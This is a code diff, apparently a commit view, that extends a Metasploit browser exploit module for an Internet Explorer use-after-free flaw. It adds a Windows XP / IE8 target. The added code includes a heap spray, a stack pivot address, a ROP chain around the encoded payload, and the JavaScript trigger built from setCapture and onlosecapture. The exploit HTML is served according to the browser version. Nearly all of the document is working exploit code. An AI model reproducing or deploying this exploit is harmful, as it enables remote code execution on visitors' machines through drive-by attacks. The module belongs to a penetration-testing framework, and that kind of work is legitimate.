@@ -38,8 +38,9 @@ def initialize(info={})
3838 'License' => MSF_LICENSE ,
3939 'Author' =>
4040 [
41- 'Unknown' , # Exploit in the wild first spotted in Japan
42- 'sinn3r' # Metasploit (thx binjo for the heads up!)
41+ 'Unknown' , # Exploit in the wild first spotted in Japan
42+ 'sinn3r' , # Metasploit (thx binjo for the heads up!)
43+ 'Rich Lundeen' # IE8 windows xp
4344 ] ,
4445 'References' =>
4546 [
@@ -53,16 +54,29 @@ def initialize(info={})
5354 'Platform' => 'win' ,
5455 'BrowserRequirements' =>
5556 {
56- :source => /script/i ,
57- :os_name => OperatingSystems ::WINDOWS ,
58- :ua_name => HttpClients ::IE ,
59- :ua_ver => "9.0" ,
60- :os_flavor => "7" ,
61- :office => /2007|2010/
57+ :source => /script/i
6258 } ,
6359 'Targets' =>
6460 [
65- [ 'Automatic' , { } ]
61+ [ 'Automatic' , { } ] ,
62+ [
63+ 'Windows 7 with Office 2007|2010' ,
64+ {
65+ :os_name => /win/i ,
66+ :ua_name => OperatingSystems ::WINDOWS ,
67+ :ua_ver => "9.0" ,
68+ :os_flavor => "7" ,
69+ :office => /2007|2010/
70+ }
71+ ] ,
72+ [
73+ 'Windows XP with IE 8' ,
74+ {
75+ :os_name => "Windows XP" ,
76+ :ua_name => HttpClients ::IE ,
77+ :ua_ver => "8.0"
78+ }
79+ ]
6680 ] ,
6781 'Payload' =>
6882 {
@@ -116,7 +130,7 @@ def get_payload(target_info)
116130 p
117131 end
118132
119- def get_exploit_html ( cli , target_info )
133+ def get_exploit_html_ie9 ( cli , target_info )
120134 gadgets = { }
121135 case target_info [ :office ]
122136 when '2007'
@@ -238,9 +252,75 @@ def get_exploit_html(cli, target_info)
238252 |
239253 end
240254
255+ def get_exploit_html_ie8 ( cli , target_info )
256+ code = payload . encoded
257+
258+ #address containing our heap spray is 0x20302020
259+ spray_addr = "\\ u2024\\ u2030"
260+
261+ #size to fill after free is 0x50
262+ free_fill = spray_addr + "\\ u2424" * ( ( ( 0x50 -1 ) /2 ) -2 )
263+
264+ rop = [
265+ 0x77c3868a , # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret ;
266+ 0x20302020 # pointer to stack pivot
267+ ] . pack ( "V*" )
268+
269+ rop << generate_rop_payload ( 'msvcrt' , code , { 'target' => 'WINDOWS XP SP3' } ) << code
270+
271+ js_rop = Rex ::Text . to_unescape ( rop )
272+
273+ %Q|
274+ <html>
275+ <script>
276+
277+ #{ js_property_spray }
278+
279+ tt = new Array(30);
280+
281+ function trigger()
282+ {
283+ var id_0 = document.createElement("sup");
284+ var id_1 = document.createElement("audio");
285+
286+ document.body.appendChild(id_0);
287+ document.body.appendChild(id_1);
288+ id_1.applyElement(id_0);
289+
290+ id_0.onlosecapture=function(e) {
291+ document.write("");
292+
293+ for(i = 0; i < tt.length; i++) {
294+ tt[i] = document.createElement('div');
295+ tt[i].className ="#{ free_fill }
296+ }
297+
298+ var s = unescape("#{ js_rop }
299+ sprayHeap({shellcode:s});
300+ }
301+
302+ id_0['outerText']="";
303+ id_0.setCapture();
304+ id_1.setCapture();
305+ }
306+
307+ window.onload = function() {
308+ trigger();
309+ }
310+ </script>
311+ |
312+
313+ end
314+
241315 def on_request_exploit ( cli , request , target_info )
242- html = get_exploit_html ( cli , target_info )
316+ case target_info [ :ua_ver ]
317+ when "8.0"
318+ html = get_exploit_html_ie8 ( cli , target_info )
319+ when "9.0"
320+ html = get_exploit_html_ie9 ( cli , target_info )
321+ end
243322 send_response ( cli , html , { 'Content-Type' => 'text/html' , 'Cache-Control' => 'no-cache' } )
323+
244324 end
245325
246326end
@@ -258,6 +338,13 @@ def on_request_exploit(cli, request, target_info)
258338 FileVersion: 2.05.50727.4039 (QFE.050727-4000)
259339
260340mshtml.dll
341+
342+ WinXP IE8 DLL info:
343+ ProductVersion: 8.0.6001.18702
344+ FileVersion: 8.0.6001.18702
345+ FileDescription: Microsoft (R) HTML Viewer
346+
347+ Win7 IE9 DLL info:
261348 ProductVersion: 9.00.8112.16446
262349 FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)
263350 FileDescription: Microsoft (R) HTML Viewer
0 commit comments